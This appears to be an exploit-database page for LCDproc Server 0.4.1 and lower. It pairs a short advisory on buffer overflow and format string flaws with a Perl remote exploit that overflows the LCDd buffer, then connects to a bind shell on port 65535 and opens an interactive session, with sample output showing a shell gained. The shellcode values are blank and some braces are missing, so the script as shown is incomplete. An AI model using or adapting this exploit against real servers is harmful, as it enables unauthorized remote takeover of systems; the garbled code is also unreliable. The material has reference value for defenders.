Suggest Exploit
LCDproc Server
Remote Code Execution
Product Name: LCDproc Server
Affected Version From: 2000.4.1
Affected Version To: 0.4.1 and lower
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Other Scripts:
Platforms Tested: Unknown

LCDproc Server Multiple Remote Vulnerabilities

The LCDproc Server (LCDd) is prone to multiple remote vulnerabilities. The first issue exists in the parse_all_client_messages() function of parse.c, where a lack of sufficient boundary checks on user-supplied arguments allows a remote attacker to execute arbitrary instructions in the context of the vulnerable service. The second issue exists in the test_func_func() function of client_functions.c, where a lack of sufficient boundary checks allows an attacker to trigger a buffer overflow. The third issue is due to an erroneous implementation of a formatted print function in the test_func_func() function of client_functions.c, allowing a remote attacker to execute code in the context of the affected service.



Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10085/info

LCDproc Server (LCDd) has been reported to be prone to multiple remote vulnerabilities.

The first issue is reported to exist in the parse_all_client_messages() function of parse.c, and is due to a lack of sufficient boundary checks performed on user-supplied arguments. A remote attacker may exploit this vulnerability to execute arbitrary instructions in the context of the vulnerable service.

The second issue exists in the test_func_func() function of client_functions.c. Due to a lack of sufficient boundary checks an attacker may pass data to the function in a manner that is sufficient to trigger a buffer overflow. An attacker may leverage this condition to execute code in the context of the affected service.

Finally due the an erroneous implementation of a formatted print function contained in the test_func_func() function of client_functions.c.A remote attacker may supply format specifier characters. An attacker may leverage this condition to execute code in the context of the affected service. 

# Priv8security.com remote exploit for lcdproc server version 0.4.1 and lower.
#   Vendor Url: http://lcdproc.omnipotent.net/
#   Play with offset "-o" to get shell.
#   [wsxz@localhost wsxz]$ perl priv8lcd.pl -h localhost -t 0
#   -=[ Priv8security.com LCDproc Server 0.4.1 and lower remote exploit ]=-
#   Connected!
#   [+] Using address: 0xbfffd904
#   [+] Checking version... Done!
#       Server is vuln :P
#   [+] Sending stuff... Done!
#   [+] Do we got a shell?
#   [+] Enjoy your stay on this server =)
#   ******  Welcome to 'localhost'  ******
#   Linux localhost.localdomain 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
#   i686 unknown unknown GNU/Linux
#   uid=503(wsxz) gid=503(wsxz) groups=503(wsxz),13(news)

use IO::Socket;
use Getopt::Std; getopts('h:p:t:o:', \%args);

if (defined($args{'h'})) { $host   = $args{'h'}; }
if (defined($args{'p'})) { $port   = $args{'p'}; }else{$port = 13666;}
if (defined($args{'t'})) { $system = $args{'t'}; }
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}

print "\n-=[ Priv8security.com LCDproc Server 0.4.1 and lower remote exploit ]=-\n\n";
print "Usage:
        -h <host>
	-p port <default 13666>
	-t target:
	    0 - linux
	    1 - freebsd
	-o <offset>\n\n";

#Priv8 portbind shellcode by Ramon de Carvalho
$shellinux =
#Priv8 portbind shellcode by Ramon de Carvalho
$shellfree =

if ($system == 1 ){#freebsd buffer
  $ret = 0xbfbfde58;
  $shellcode = $shellfree;

if ($system == 0){#linux buffer
  $ret = 0xbfffd658;
  $shellcode = $shellinux;

  $new_ret = pack('l', ($ret + $offset));
  $buffer .= "\x90" x (1322 - length($shellcode));
  $buffer .= $shellcode;
  $buffer .= $new_ret x 10;

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] Cant connect\n";

  print "Connected!\n";
  print "[+] Using address: 0x", sprintf('%lx',($ret)), "\n";
  print STDERR "[+] Checking version...";
  print $sock "hello\n";
  $awser = <$sock>;

    if($awser =~ /0.4.3/ || $awser =~ /0.4.4/  ){
      print STDERR " Done!\n";
      print STDERR "[-] The server is not vuln.\n";
  print STDERR " Done!\n";
  print STDERR "    Server is vuln :P\n";
  print STDERR "[+] Sending stuff... ";
  print $sock "$buffer\n";
  print STDERR "Done!\n";
  print "[+] Do we got a shell?\n";


$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>65535,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try other offset next time ok.\n";

  print "[+] Enjoy your stay on this server =)\n";

  print $sc "echo;echo \"******  Welcome to '`hostname`'  ******\"\n";
  print $sc "echo;uname -a;id;echo\n";

  die "cant fork: $!" unless defined($pid = fork());

  if ($pid) {
      while(defined ($line = <$sc>)) {
          print STDOUT $line;
      kill("TERM", $pid);
      while(defined ($line = <STDIN>)) {
          print $sc $line;
  print "Good bye!!\n";